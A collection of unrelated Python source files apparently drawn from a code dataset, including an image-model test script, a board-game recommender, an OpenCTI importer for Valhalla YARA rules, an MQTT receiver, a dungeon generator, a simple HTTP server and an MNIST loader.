args.gpu_ids\n else:\n cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)\n\n mata = dict()\n\n # make dirs\n mkdir_or_exist(osp.abspath(cfg.savepath))\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n cfg.log_file = osp.join(cfg.savepath, f'{timestamp}.log')\n\n # create text log\n # build model\n model = build_network(cfg.model, train_cfg=cfg.train_cfg, test_cfg=cfg.test_cfg)\n load(cfg.load_from, model, None)\n # build dataset\n datasets = build_dataset(cfg.data.test)\n # put model on gpu\n if torch.cuda.is_available():\n # model = DataParallel(model.cuda(), device_ids=cfg.gpu_ids)\n model = model.cuda()\n # create data_loader\n data_loader = 
build_dataloader(\n datasets,\n cfg.data.val_samples_per_gpu,\n cfg.data.val_workers_per_gpu,\n len(cfg.gpu_ids))\n\n save_cfg = False\n for i in range(len(cfg.test_pipeling)):\n if 'Normalize' == cfg.test_pipeling[i].type:\n save_cfg = True\n\n save_path = osp.join(cfg.savepath, cfg.load_from.split('/')[-1].split('.')[0])\n mkdir_or_exist(save_path)\n # before run\n model.eval()\n t = time.time()\n for i, data in enumerate(data_loader):\n # before iter\n\n inputs = data['image']\n with torch.no_grad():\n out_rgb = model(inputs)\n print('writing' + data['image_id'][0] + '.png')\n # input_numpy = normimage_test(inputs, save_cfg=save_cfg)\n rgb_numpy = normimage_test(out_rgb, save_cfg=save_cfg, usebytescale=cfg.usebytescale)\n\n outsavepath = osp.join(save_path, data['image_id'][0] + '.png')\n inputsavepath = osp.join(save_path, data['image_id'][0] + '_input.png')\n\n # save_image(input_numpy, inputsavepath)\n save_image(rgb_numpy, outsavepath, usebytescale=cfg.usebytescale)\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"506796352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Proxy users recommender model\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.decomposition import TruncatedSVD, PCA\nfrom scipy.spatial.distance import cdist\nfrom sklearn.preprocessing import StandardScaler\nfrom numpy.random import shuffle\nimport bz2\nimport pickle\n\n# Recommender model 1: Proxy User Search\nclass RecommenderProxyUsers():\n \"\"\"recommender engine as an estimator\"\"\"\n\n # ******************************************************************\n def __init__(self, n_proxy_users=10):\n \"\"\"\n Called when initializing the model\n \"\"\"\n # model parameters\n self.n_proxy_users = n_proxy_users\n \n self.user_data = None\n self.item_data = 
None\n self.n_top_items = 10\n self.user_factors = None \n self.item_factors = None \n self.user_top_rated = None \n self.item_id_to_index_dict = None\n self.user_info = None\n\n # ******************************************************************\n def set_params(self, **params):\n self.__dict__.update(params)\n \n # ******************************************************************\n def read_model_data(self, filepath):\n\n with bz2.BZ2File(filepath, 'rb') as pickle_in:\n [self.user_data, self.item_data] = pickle.load(pickle_in)\n \n # set any games with no categories or mechanics to 'none'\n self.item_data.loc[self.item_data['categories'].isnull(), 'categories'] = 'none'\n self.item_data.loc[self.item_data['mechanics'].isnull(), 'mechanics'] = 'none'\n\n # column labels for data subsets\n user_top_cols = [col for col in self.user_data.columns if 'top_' in col]\n user_factor_cols = [col for col in self.user_data.columns if 'factor_' in col]\n item_factor_cols = [col for col in self.item_data.columns if 'factor_' in col]\n item_info_cols = [col for col in self.item_data.columns if 'factor_' not in col]\n\n # split up data for faster processing\n self.user_factors = self.user_data[user_factor_cols].values\n self.user_top_rated = self.user_data[user_top_cols].values \n \n # number of top items (games) in this dataset\n self.n_top_items = self.user_top_rated.shape[1]\n \n self.item_factors = self.item_data[item_factor_cols].values \n self.item_info = self.item_data[item_info_cols]\n \n self.item_id_to_index_dict = {key: value for (key, value) in \n zip(self.item_data['id'], \n range(len(self.item_data['id'])))}\n \n self.item_title_to_id_dict = {key: value for (key, value) in \n zip(self.item_data['name'].str.lower(), \n self.item_data['id'].astype(int))}\n \n # ******************************************************************\n def get_tags_from_csv_list(self, taglist):\n \"\"\"Create df with all unique tags contained in \n list of csv strings containing multiple 
tags each.\n Returns tags and counts sorted by most frequent to least.\"\"\"\n all_tags = []\n for tagset in taglist:\n all_tags += tagset.split(',')\n unique_tags, counts = np.unique(all_tags, return_counts=True)\n return pd.DataFrame( {'tag':unique_tags, 'count':counts} ).sort_values(\n by='count', ascending=False)\n\n # ******************************************************************\n def get_categories_and_mechanics(self):\n \"\"\"return lists of all category and mechanic labels\"\"\"\n \n # get all categories, sorted by counts\n categories = self.get_tags_from_csv_list(self.item_data['categories'].values)\n \n # remove expansion tag from list\n categories = categories[categories['tag'] != 'Expansion for Base-game']\n\n # get list of all mechanics, sorted by counts\n mechanics = self.get_tags_from_csv_list(self.item_data['mechanics'].values)\n \n return categories, mechanics\n \n # ******************************************************************\n def get_item_title_id(self, titles):\n \"\"\"return list of integer item IDs given title names (case insensitive)\"\"\"\n return [self.item_title_to_id_dict[title.lower()] for title in titles]\n \n # ******************************************************************\n def get_item_id_index(self, ids):\n \"\"\"return list of array indices given item IDs\"\"\"\n return [self.item_id_to_index_dict[itemid] for itemid in ids]\n\n # ******************************************************************\n def get_filtered_item_index(self, items, \n weightrange=[1,5],\n minrating=1,\n categories_include=[],\n categories_exclude=[],\n mechanics_include=[],\n mechanics_exclude=[]):\n\n # start with all data\n filt_items = items\n\n# print('filter_data, all data:',filt_items.shape)\n\n # filter by game weight\n # only filter if not defaults: [1,5]\n if weightrange[0] > 1 or weightrange[1] < 5:\n filt_items = filt_items[ (filt_items['weight'] >= weightrange[0]) &\n (filt_items['weight'] <= weightrange[1])]\n# print('weightrange, 
filt_items:',filt_items.shape)\n\n # filter by lowest average game rating\n # only filter if not default: 1\n if minrating > 1:\n filt_items = filt_items[ filt_items['mean_rating'] >= minrating ]\n# print('minrating, filt_items:',filt_items.shape)\n\n def tags_in_col(col, taglist):\n return col.apply(lambda x: any(tag in x for tag in taglist))\n\n # filter by categories to include\n # only filter if not default: [], or ['Any category',...]\n if (len(categories_include) and \n 'Any category' not in categories_include):\n filt_items = filt_items[ tags_in_col(filt_items['categories'], categories_include)]\n# print('categories_include, filt_items:',filt_items.shape)\n\n # filter by categories to exclude\n # only filter if not default: []\n if len(categories_exclude):\n filt_items = filt_items[ ~(tags_in_col(filt_items['categories'], categories_exclude))]\n# print('categories_exclude, filt_items:',filt_items.shape)\n\n # filter by mechanics to include\n # only filter if not default: [], or ['Any category',...]\n if (len(mechanics_include) and \n 'Any mechanism' not in mechanics_include):\n filt_items = filt_items[ tags_in_col(filt_items['mechanics'], mechanics_include)]\n# print('mechanics_include, filt_items:',filt_items.shape)\n\n# print(' filt_items:',filt_items.shape)\n\n return self.get_item_id_index(filt_items['id'])\n\n # ******************************************************************\n def get_sorted_proxy_index(self, user_liked):\n liked_idx_set = set(self.get_item_id_index(user_liked))\n scores = [-len(liked_idx_set.intersection(row)) for row in self.user_top_rated]\n return np.argsort(scores)\n\n # ******************************************************************\n def ratings_from_factors(self, row_index):\n return (np.dot(self.user_factors[row_index,:], self.item_factors.T))\n \n # ******************************************************************\n def recommend_items_by_pref_list(self, liked_item_ids, num2rec=10, **filtargs): \n \n \"\"\"Recommend 
games using multiple liked games in a list of titles.\n This method creates a set of recommended games for each title in prefs and\n then selects the most commonly recommended\"\"\"\n \n # get indices to proxy users\n proxy_idx = self.get_sorted_proxy_index(liked_item_ids)\n\n # average ratings for all items among proxy users\n ratings = np.mean(self.ratings_from_factors(proxy_idx[:self.n_proxy_users]), axis=0)\n \n # Create some randomness here by adding a +/- random \n # value to the ratings\n randrange = .2\n randvals = np.random.random(len(ratings))*randrange\n fuzzed_ratings = np.multiply(ratings, randvals)\n \n # get indices of filter allowed items\n filt_item_idx = self.get_filtered_item_index(self.item_info, **filtargs)\n \n def filter_items(item_idx, filter_idx, liked_item_ids):\n \"\"\"return ordered list of item indices that intersect with filter_idx.\n Also, exclude games in the liked item list\"\"\"\n filt_ids = [i for i in item_idx if i in set(filter_idx)]\n return [i for i in filt_ids if not i in set(liked_item_ids)] \n \n # filtered descending sort of item ratings\n item_idx = filter_items(np.argsort(-fuzzed_ratings), \n filt_item_idx, \n self.get_item_id_index(liked_item_ids))\n \n # select num2rec top rated game IDs \n return self.item_data['name'].values[item_idx[:num2rec]]\n \n \n\n","sub_path":"capstone_2/deploy_bokeh_top_ALS_rating_proxy/bokeh_app/recommender_proxy_users.py","file_name":"recommender_proxy_users.py","file_ext":"py","file_size_in_byte":9424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45887794","text":"import pornhub\r\n\r\n\r\nallowableWords = set()\r\nwith open(\"the-king-james-bible.txt\", \"r\") as f:\r\n allTheLines = f.readlines()\r\n for line in allTheLines:\r\n words = line.split(\" \")\r\n for word in words:\r\n allowableWords.add(word)\r\n\r\ndef getKeyWords():\r\n print(\"type all your keywords seperated by a space\")\r\n keywords = input().split(\" 
\")\r\n\r\n hasBadWords = False\r\n badWords = []\r\n for keyword in keywords:\r\n if keyword not in allowableWords:\r\n hasBadWords = True\r\n badWords.append(keyword)\r\n\r\n if hasBadWords:\r\n print(\"{}! That word is not approved by Jesus! Try again \\n\\n\\n\\n\\n\".format(\", \".join(badWords).title())) \r\n keywords = getKeyWords()\r\n \r\n return keywords\r\n#client = pornhub.PornHub(\"5.135.164.72\", 3128, search_keywords)\r\n#With proxy, given a Proxy IP and Port. For the countries with restricted access like Turkey, etc.\r\nsearch_keywords = getKeyWords()\r\nprint(search_keywords)\r\nclient = pornhub.PornHub(search_keywords)\r\n \r\nfor video in client.getVideos(quantity=10):\r\n print(video[\"name\"])\r\n print(video[\"url\"])\r\n print()","sub_path":"kingJamesTest.py","file_name":"kingJamesTest.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85768240","text":"import numpy as np\nanlist = [0,1,3,1,1,4,1]\nlandlist = [2,3,4,1,1,1,1]\nanlist = np.array(anlist)\nlandlist = np.array(landlist)\nventetid = 0 \n#venteliste = []\n\n# cumsum af lister\ncum_landlist = np.cumsum(landlist)\ncum_anlist = np.cumsum(anlist)\n\nfor i in range(len(landlist)):\n if i > 0:\n if cum_anlist[i] < cum_landlist[i-1]:\n ventetid = ventetid+ cum_landlist[i-1]-cum_anlist[i]\n# venteliste.append(ventetid)\n# ventetid = 0\n else:\n ventetid = ventetid\nprint(ventetid)\n\n\n\"\"\"\nDette skulle gerne fungere!!!\n\nNår vi er HELT færdige med koden kunne det være en ide at omskrive det til\nsamme type kode som vores anden for løkke, der laver de randomtider.\nAltså sætte de to arrays sammen og bruge enumerate funktionen.\n\n\"\"\"","sub_path":"Python/MODSIM - Miniprojekt/Trash.py","file_name":"Trash.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"148602590","text":"# 整型变量\na = 100\n# 
浮点型变量\nb = 100.0\n# 字符串\nc = 'wxl'\nprint(a, b, c)\n#没有类型定义关键字,根据赋初始值来确定变量类型\n\nd=1.23\n\n#变量测试\n\n#多个变量多重赋值\ne = f = g = 100\nprint(e, f, g)\n\n#多元赋值\nh, i, j = 100, 100.0, 'wxl'\nprint(h, i, j)\n\n#查询变量类型函数:type()\n#内置的 type() 函数可以用来查询变量所指的对象类型。\na = 1000\nprint(type(a))\n\n#判断对象类型函数:isinstance()\n\na = 1000\nprint(isinstance(a, int))\n\n#两者区别\n#type() 不会认为子类是一种父类类型;\n#isinstance() 会认为子类是一种父类类型。","sub_path":"Test_2.py","file_name":"Test_2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"211768634","text":"import torch\nfrom torch.utils.data import Dataset\n\nfrom .stereo_dataset import StereoDataset\nfrom .dexter_object import DexterObjectDataset\n\n\nclass MixedDataset(Dataset):\n def __init__(self, config):\n \n self.Stereo = StereoDataset({'path': config['path_stereo'], \n 'augment': config['augment'],\n 'scope': config['scope']})\n \n self.DexterObject = DexterObjectDataset({'path': config['path_dexter'], \n 'augment': config['augment'],\n 'scope': config['scope']})\n \n self.len_Stereo = self.Stereo.__len__()\n self.len_DexterObject = self.DexterObject.__len__()\n \n\n def __getitem__(self, idx):\n\n if idx < self.len_Stereo:\n return self.Stereo.__getitem__(idx)\n else:\n return self.DexterObject.__getitem__(idx-self.len_Stereo)\n\n \n def __len__(self):\n return self.len_Stereo + self.len_DexterObject\n\n \n \n","sub_path":"dataset/mixed_dataset_real.py","file_name":"mixed_dataset_real.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334699712","text":"# -*- coding: utf-8 -*-\n\"\"\"OpenCTI Valhalla Knowledge importer module.\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict, List, Mapping, Optional\nfrom urllib.parse import urlparse\n\nfrom .models import ApiResponse\n\nfrom pycti.connector.opencti_connector_helper import 
OpenCTIConnectorHelper\nfrom stix2 import TLP_WHITE, TLP_GREEN, TLP_AMBER, TLP_RED\n\n\nclass KnowledgeImporter:\n \"\"\"Valhalla Knowledge importer.\"\"\"\n\n _GUESS_NOT_A_MALWARE = \"GUESS_NOT_A_MALWARE\"\n _GUESS_NOT_A_ACTOR = \"GUESS_NOT_A_ACTOR\"\n _KNOWLEDGE_IMPORTER_STATE = \"knowledge_importer_state\"\n _TLP_MAPPING = {\n \"tlp_white\": \"TLP_WHITE\",\n \"tlp_green\": \"TLP_GREEN\",\n \"tlp_amber\": \"TLP_AMBER\",\n \"tlp_red\": \"TLP_RED\",\n }\n\n def __init__(\n self,\n helper: OpenCTIConnectorHelper,\n confidence_level: int,\n update_data: bool,\n default_marking,\n valhalla_client: str,\n ) -> None:\n \"\"\"Initialize Valhalla indicator importer.\"\"\"\n self.helper = helper\n self.guess_malware = True\n self.guess_actor = True\n self.confidence_level = confidence_level\n self.update_data = update_data\n self.default_marking = default_marking\n self.valhalla_client = valhalla_client\n self.malware_guess_cache: Dict[str, str] = {}\n self.actor_guess_cache: Dict[str, str] = {}\n self.date_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S+00:00\")\n self.organization = helper.api.identity.create(\n name=\"Nextron Systems GmbH\",\n type=\"Organization\",\n description=\"THOR APT scanner and Valhalla Yara Rule API Provider\",\n )\n\n def run(self, state: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"Run importer.\"\"\"\n self.helper.log_info(\"running Knowledge importer with state: \" + str(state))\n\n self._load_opencti_tlp()\n self._process_rules()\n\n state_timestamp = datetime.utcnow().timestamp()\n self.helper.log_info(\"knowledge importer completed\")\n return {self._KNOWLEDGE_IMPORTER_STATE: state_timestamp}\n\n def _process_rules(self) -> None:\n try:\n rules_json = self.valhalla_client.get_rules_json()\n response = ApiResponse.parse_obj(rules_json)\n except Exception as err:\n self.helper.log_error(f\"error downloading rules: {err}\")\n return None\n\n for yr in response.rules:\n try:\n indicator = self.helper.api.indicator.create(\n 
name=yr.name,\n description=yr.cti_description,\n pattern_type=\"yara\",\n indicator_pattern=yr.content,\n markingDefinitions=[self.default_marking[\"id\"]],\n main_observable_type=\"File-SHA256\",\n createdByRef=self.organization[\"id\"],\n valid_from=yr.cti_date,\n score=yr.score,\n update=self.update_data,\n detection=True,\n )\n except Exception as err:\n self.helper.log_error(f\"error creating indicator: {err}\")\n\n self._add_refs_for_id([yr.reference], indicator[\"id\"])\n self._add_tags_for_indicator(yr.tags, indicator[\"id\"])\n\n def _add_tags_for_indicator(self, tags: list, indicator_id: str) -> None:\n for tag in tags:\n # We skip on tags with MITRE ids for now\n if re.search(r\"^\\D\\d{4}$\", tag):\n continue\n # Create Hygiene Tag\n tag_valhalla = self.helper.api.tag.create(\n tag_type=\"Valhalla\", value=tag, color=\"#46beda\",\n )\n self.helper.api.stix_entity.add_tag(\n id=indicator_id, tag_id=tag_valhalla[\"id\"]\n )\n\n def _add_refs_for_id(self, refs: list, obj_id: str) -> None:\n if refs == {} or obj_id == \"\":\n return None\n\n for ref in refs:\n if ref == \"-\":\n continue\n try:\n san_url = urlparse(ref)\n except Exception:\n self.helper.log_error(f\"error parsing ref url: {ref}\")\n continue\n\n reference = self.helper.api.external_reference.create(\n source_name=\"Nextron Systems Valhalla API\",\n url=san_url.geturl(),\n description=\"Rule Reference: \" + san_url.geturl(),\n )\n self.helper.api.stix_entity.add_external_reference(\n id=obj_id, external_reference_id=reference[\"id\"],\n )\n\n def _guess_malwares_from_tags(self, tags: List[str]) -> Mapping[str, str]:\n if not self.guess_malware:\n return {}\n\n malwares = {}\n\n for tag in tags:\n if not tag:\n continue\n guess = self.malware_guess_cache.get(tag)\n if guess is None:\n guess = self._GUESS_NOT_A_MALWARE\n\n id = self._fetch_malware_id_by_name(tag)\n if id is not None:\n guess = id\n\n self.malware_guess_cache[tag] = guess\n\n if guess == self._GUESS_NOT_A_MALWARE:\n 
self.helper.log_info(f\"Tag '{tag}'' does not reference malware\")\n else:\n self.helper.log_info(f\"Tag '{tag}' references malware '{guess}'\")\n malwares[tag] = guess\n return malwares\n\n def _guess_actor_from_tags(self, tags: List[str]) -> Mapping[str, str]:\n if not self.guess_actor:\n return {}\n\n actors = {}\n\n for tag in tags:\n if not tag:\n continue\n guess = self.actor_guess_cache.get(tag)\n if guess is None:\n guess = self._GUESS_NOT_A_ACTOR\n\n id = self._fetch_actor_id_by_name(tag)\n if id is not None:\n guess = id\n\n self.actor_guess_cache[tag] = guess\n\n if guess == self._GUESS_NOT_A_ACTOR:\n self.helper.log_info(f\"Tag '{tag}' does not reference actor\")\n else:\n self.helper.log_info(f\"Tag '{tag}' references actor '{guess}'\")\n actors[tag] = guess\n return actors\n\n def _fetch_malware_id_by_name(self, name: str) -> Optional[str]:\n if name == \"\":\n return None\n filters = [\n self._create_filter(\"name\", name),\n self._create_filter(\"alias\", name),\n ]\n for fil in filters:\n malwares = self.helper.api.malware.list(filters=fil)\n if malwares:\n if len(malwares) > 1:\n self.helper.log_info(f\"More then one malware for '{name}'\")\n malware = malwares[0]\n return malware[\"id\"]\n return None\n\n def _fetch_actor_id_by_name(self, name: str) -> Optional[str]:\n if name == \"\":\n return None\n filters = [\n self._create_filter(\"name\", name),\n self._create_filter(\"alias\", name),\n ]\n for fil in filters:\n actors = self.helper.api.threat_actor.list(filter=fil)\n if actors:\n if len(actors) > 1:\n self.helper.log_info(f\"More then one actor for '{name}'\")\n actor = actors[0]\n return actor[\"id\"]\n return None\n\n @staticmethod\n def _create_filter(key: str, value: str) -> List[Mapping[str, Any]]:\n return [{\"key\": key, \"values\": [value]}]\n\n def _load_opencti_tlp(self):\n self._TLP_MAPPING[\"tlp_white\"] = self.helper.api.marking_definition.read(\n id=TLP_WHITE[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_green\"] = 
self.helper.api.marking_definition.read(\n id=TLP_GREEN[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_amber\"] = self.helper.api.marking_definition.read(\n id=TLP_AMBER[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_red\"] = self.helper.api.marking_definition.read(\n id=TLP_RED[\"id\"]\n )\n","sub_path":"valhalla/src/valhalla/knowledge.py","file_name":"knowledge.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326574980","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Karanjot\n#\n# Created: 26/04/2017\n# Copyright: (c) Karanjot 2017\n# Licence: \n#-------------------------------------------------------------------------------\nfrom graphics import *\ndef main():\n print(\"This program creates 2 circles using clones\")\n win = GraphWin(\"clones\")\n leftEye = Circle(Point(80,50), 5)\n leftEye.setFill(\"yellow\")\n leftEye.setOutline(\"red\")\n rightEye = leftEye.clone() # rightEye is an exact copy of the left. can't do rightEye = leftEye\n rightEye.move(20,0)\n leftEye.draw(win)\n rightEye.draw(win)\nmain()","sub_path":"program creates 2 circles with clone.py","file_name":"program creates 2 circles with clone.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320774284","text":"import logging\nimport threading\n\nimport paho.mqtt.client as paho_mqtt_client\n\nfrom settings import Settings\nfrom mqtt_message import MqttMessage\n\n\nclass MqttReceiver(threading.Thread):\n \"\"\" Class that offers the possibility to receive mqtt messages. 
\"\"\"\n\n def __init__(self, topic):\n \"\"\"\n Constructor that initializes necessary\n variables for mqtt connection.\n\n :param topic: topic that gets handled by this receiver thread\n \"\"\"\n super(MqttReceiver, self).__init__(name=\"MqttReceiverThread-\"+str(topic))\n\n self.topic = topic\n\n self._stop = threading.Event()\n self.message_list = []\n self.mqtt_client = paho_mqtt_client.Client()\n self.mqtt_client.on_connect = self.on_connect\n self.mqtt_client.on_disconnect = self.on_disconnect\n self.mqtt_client.on_message = self.on_message\n\n def stop(self):\n \"\"\"\n Sets the internal stop event to\n request the thread stopping.\n \"\"\"\n logging.debug(\"Calling stop on: \"+self.name)\n self._stop.set()\n\n def stopped(self):\n \"\"\"\n Returns whether the internal\n stop event is set.\n \"\"\"\n return self._stop.is_set()\n\n def run(self):\n \"\"\"\n Thread starting method that connects the\n receiver and starts the necessary loops.\n Stops and disconnects if the internal\n stop event is set.\n \"\"\"\n logging.info('MQTT receiver for ' + str(self.topic) + ' started.')\n self.mqtt_client.connect(Settings.mqtt_broker_host, Settings.mqtt_port)\n self.mqtt_client.loop_start()\n\n while not self.stopped():\n pass\n\n self.mqtt_client.loop_stop(force=True)\n self.mqtt_client.disconnect()\n logging.info('MQTT receiver for ' + str(self.topic) + ' stopped.')\n\n def on_connect(self, mqttc, userdata, flags, rc):\n \"\"\" Subsribes to the topic and prints a log message on connecting. \"\"\"\n self.mqtt_client.subscribe(self.topic, Settings.mqtt_qos)\n logging.info('MQTT receiver for ' + str(self.topic) + ' connected with result code ' + str(rc))\n\n def on_disconnect(self, client, userdata, rc):\n \"\"\" Prints a log message on disconnecting. 
\"\"\"\n logging.info('MQTT receiver for ' + str(self.topic) + ' disconnected with result code ' + str(rc))\n\n def on_message(self, client, userdata, message):\n \"\"\"\n Prints a log message if a message is received\n and adds the message as a mqtt_message object\n to the message_list.\n \"\"\"\n logging.debug('MQTT receiver for ' + str(self.topic) + ' got message: ' + str(message.payload))\n self.message_list.append(MqttMessage(topic=self.topic, payload=message.payload, qos=message.qos))\n\n def pop(self):\n \"\"\"\n Pops the first (oldest) element from\n the message list and returns it.\n \"\"\"\n if self.message_list:\n return self.message_list.pop(0)\n","sub_path":"mqtt_receiver.py","file_name":"mqtt_receiver.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"534182945","text":"#!/usr/bin/env python3\n\nimport math\nimport random\n\nclass Dungeon_Generator():\n\n\tROOM_SIZE_MEAN = 7\n\tROOM_SIZE_VAR = 2\n\n\tdef __init__(self, seed, size):\n\t\trandom.seed(seed)\n\t\tself.seed = seed\n\t\tself.size = size\n\t\tself.dungeon = size * [None]\n\t\tfor i in range(0, size):\n\t\t\tself.dungeon[i] = size * [False]\n\t\tself.rooms = []\n\n\tdef generate_dungeon(self):\n\t\twhile len(self.rooms) < 10:\n\t\t\tself._generate_room(1)\n\n\tdef _generate_room(self, size):\n\t\twidth = 0\n\t\twhile width < 2:\n\t\t\twidth = math.floor(random.gauss(Dungeon_Generator.ROOM_SIZE_MEAN, Dungeon_Generator.ROOM_SIZE_VAR))\n\t\theight = 0\n\t\twhile height < 2:\n\t\t\theight = math.floor(random.gauss(Dungeon_Generator.ROOM_SIZE_MEAN, Dungeon_Generator.ROOM_SIZE_VAR))\n\t\tx = random.randint(0, self.size - width)\n\t\ty = random.randint(0, self.size - height)\n\t\tif self._area_is_clear(x-1, y-1, width+2, height+2):\n\t\t\tself._mark_area(x, y, width, height, True)\n\t\t\tself.rooms.append((x, y, width, height))\n\t\t\treturn True\n\t\treturn False\n\n\tdef _mark_area(self, x, y, width, 
height, mark):\n\t\tfor i in range(y, y + height):\n\t\t\tfor j in range(x, x + width):\n\t\t\t\tself.dungeon[i][j] = mark\n\n\tdef _area_is_clear(self, x, y, width, height):\n\t\treturn (x >= 0 and\n\t\t\t\ty >= 0 and\n\t\t\t\tx + width < len(self.dungeon) and\n\t\t\t\ty + height < len(self.dungeon) and\n\t\t\t\tnot any(any(row) for row in self._extract(x, y, width, height)))\n\n\tdef _extract(self, x, y, width, height):\n\t\treturn [(row[x:x+width]) for row in self.dungeon[y:y+height]]\n\n\tdef print_dungeon(self, dungeon=None):\n\t\tif not dungeon:\n\t\t\tdungeon = self.dungeon\n\t\tprint(\"\\n\".join(\"\".join((\" \" if cell else \"**\") for cell in row) for row in dungeon))\n\nif __name__ == \"__main__\":\n\ta = [[False, False, True],\n\t [False, True, False],\n\t [False, False, False]]\n\tdg = Dungeon_Generator(random.random(), 30)\n\t# dg = Dungeon_Generator(, 50)\n\tdg.generate_dungeon()\n\tdg.print_dungeon()\n\t# print(dg.seed)\n","sub_path":"dungen.py","file_name":"dungen.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362779727","text":"import select\nimport socket\nimport sys\nimport queue\n\nport = int(sys.argv[1])\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #the accept socket\ns.setblocking(0)\n\ns.bind((socket.gethostname(), port))\ns.listen(5)\n\nread_list = [s]\nwrite_list = []\nmessage_queues = {}\n\nwhile True:\n readable, writable, exceptional = select.select(read_list, write_list, read_list)\n #Note: This code, as well as several other parts of this script, were taken from https://pymotw.com/3/select/\n\n for readable_socket in readable:\n if readable_socket is s:\n clientSock, clientAddr = s.accept()\n clientSock.setblocking(0)\n read_list.append(clientSock)\n message_queues[clientSock] = queue.Queue()\n else:\n fullRequest = readable_socket.recv(4096).decode()\n if fullRequest: #got data\n if readable_socket not in write_list:\n 
write_list.append(readable_socket)\n\n header = {}\n firstLine = fullRequest.split('\\n')[0].split(' ')\n header['HTTP-Command'] = firstLine[0]\n header['Path'] = firstLine[1]\n header['HTTP-Type'] = firstLine[2]\n for line in fullRequest.split('\\n\\r\\n')[0].split('\\n'):\n if ':' in line:\n x, y = line.split(':', 1)\n header[x] = y.strip()\n\n if len(fullRequest) == 4096:\n try:\n while len(fullRequest) < int(header['Content-Length']):\n request = clientSock.recv(4096) # recieve the request with max of 4096 bits(?) at once\n fullRequest += request.decode()\n except Exception as e:\n while True:\n request = clientSock.recv(4096)\n fullRequest += request.decode()\n if len(request.decode()) < 4096:\n break\n\n\n # Controlling all the request stuff here, pretty self explanatory\n if header['HTTP-Command'] != 'GET':\n fullResponse = 'HTTP/1.1 400 Bad Request\\r\\nContent-Length: 0\\r\\nContent-Type: text/html\\r\\n\\r\\n'\n elif not (header['Path'][-4:] == '.htm' or header['Path'][-5:] == '.html'):\n fullResponse = 'HTTP/1.1 403 Forbidden\\r\\nContent-Length: 0\\r\\nContent-Type: text/html\\r\\n\\r\\n'\n else:\n try:\n file = open(header['Path'][1:], 'r')\n response = file.read()\n file.close()\n\n responselength = len(response)\n responsetype = 'text/html'\n exit_code = '200 OK'\n except Exception as e:\n response = ''\n responselength = 0\n responsetype = 'text/html'\n exit_code = '404 Not Found'\n\n fullResponse = 'HTTP/1.1 ' + exit_code + '\\r\\nContent-Length: ' + str(responselength) + '\\r\\nContent-Type: ' + responsetype +'\\r\\n\\r\\n' + response\n message_queues[readable_socket].put(fullResponse)\n else: #didn't get data\n if readable_socket in write_list:\n write_list.remove(readable_socket)\n read_list.remove(readable_socket)\n readable_socket.close()\n del message_queues[readable_socket]\n\n for writable_socket in writable:\n try:\n next_message = message_queues[writable_socket].get_nowait()\n writable_socket.send(next_message.encode())\n except 
queue.Empty:\n write_list.remove(writable_socket)\n\n for exceptional_socket in exceptional:\n if exceptional_socket in write_list:\n write_list.remove(exceptional_socket)\n read_list.remove(exceptional_socket)\n exceptional_socket.close()\n del message_queues[exceptional_socket]\n","sub_path":"http_server2_incomplete.py","file_name":"http_server2_incomplete.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462955453","text":"# coding utf-8\nimport gzip\nimport os\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef batch_generator(X, y, batch_size=32, shuffle=True):\n n_data = len(X)\n index = np.arange(len(y))\n if shuffle:\n np.random.shuffle(index)\n for ii in range(0, n_data, batch_size):\n if n_data - ii < batch_size:\n features = X[index[ii:]]\n targets = y[index[ii:]]\n else:\n features = X[index[ii : ii + batch_size]]\n targets = y[index[ii : ii + batch_size]]\n yield features, targets\n\n\nclass mnist_dataset:\n def __init__(self, dir_path):\n\n assert os.path.exists(dir_path), \"Arguments error: dir_path does not exist\"\n\n # store path of the data directory\n self.dir_path = dir_path + os.sep\n # define file name\n self.ftrain_feature = self.dir_path + os.path.sep + \"train-images-idx3-ubyte.gz\"\n self.ftrain_labels = self.dir_path + os.path.sep + \"train-labels-idx1-ubyte.gz\"\n self.ftest_features = self.dir_path + os.path.sep + \"t10k-images-idx3-ubyte.gz\"\n self.ftest_labels = self.dir_path + os.path.sep + \"t10k-labels-idx1-ubyte.gz\"\n\n for path in [\n self.ftrain_feature,\n self.ftrain_labels,\n 